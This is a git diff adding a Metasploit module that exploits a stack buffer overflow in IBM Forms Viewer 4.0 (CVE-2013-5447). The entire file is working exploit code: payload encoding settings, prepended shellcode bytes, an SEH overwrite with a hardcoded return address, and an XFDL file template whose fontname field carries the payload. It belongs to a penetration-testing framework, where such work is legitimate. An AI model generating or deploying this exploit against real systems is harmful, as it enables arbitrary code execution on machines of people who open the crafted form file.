diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
new file mode 100644
index 0000000000..8654db7e58
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IBM Forms Viewer Unicode Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
+        is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
+        XFDL files, with a long fontname value. This module has been tested successfully on IBM
+        Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez', # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-5447' ],
+          [ 'OSVDB', '100732' ],
+          [ 'ZDI', '13-274' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
+        ],
+      'Payload'        =>
+        {
+          'Space'          => 3000,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ECX',
+              'BufferOffset' => 10
+            },
+          'BadChars'       => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
+          'DisableNops'    => true,
+          # Fix the stack before the payload is executed, so we avoid
+          # windows exceptions due to alignment
+          'Prepend'        =>
+              "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+              "\x83\xC0\x08"             + # add eax, byte 8
+              "\x8b\x20"                 + # mov esp, [eax]
+              "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
+            {
+              'Ret'    => 0x4c30, # p/p/r unicode from masqform.exe
+              'Nop'    => 0x47, # 004700 => add [edi+0x0],al
+              'Offset' => 62
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 03 2008',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The file name.',  'msf.xfdl']),
+      ], self.class)
+  end
+
+  def exploit
+
+
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << "\x61\x62"             # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
+    sploit << [target.ret].pack("v") # seh # ppr
+    sploit << [target['Nop']].pack("C")
+    sploit << payload.encoded
+    sploit << rand_text_alpha(4096) # make it crash
+
+
+    xfdl = %Q|<?xml version="1.0" encoding="UTF-8"?>
+<XFDL xmlns:custom="http://www.ibm.com/xmlns/prod/XFDL/Custom" xmlns:designer="http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xfdl="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+   <globalpage sid="global">
+      <global sid="global">
+         <designer:date>20060615</designer:date>
+         <formid>
+            <title></title>
+            <serialnumber>A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000</serialnumber>
+            <version>1</version>
+         </formid>
+      </global>
+   </globalpage>
+   <page sid="PAGE1">
+      <global sid="global">
+         <label>PAGE1</label>
+      </global>
+       <label sid="TITLE">
+         <itemlocation>
+            <x>20</x>
+            <y>0</y>
+         </itemlocation>
+         <value compute="global.global.custom:formTitle">Metasploit</value>
+         <fontinfo>
+            <fontname>#{sploit}</fontname>
+         </fontinfo>
+      </label>
+   </page>
+</XFDL>
+|
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    file_create(xfdl)
+
+  end
+
+end